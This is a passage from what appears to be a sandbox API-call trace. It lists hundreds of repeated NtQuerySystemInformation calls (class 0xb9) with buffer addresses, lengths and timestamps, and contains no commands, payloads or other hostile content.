SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0206.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd440, Length=0x20, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd320, Length=0x28, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x48, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e8, Length=0x48, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x48, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x28, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x28, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcea0, Length=0x20, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x20, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x50, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x50, ResultLength=0x0) [0206.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x38, ResultLength=0x0) [0206.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 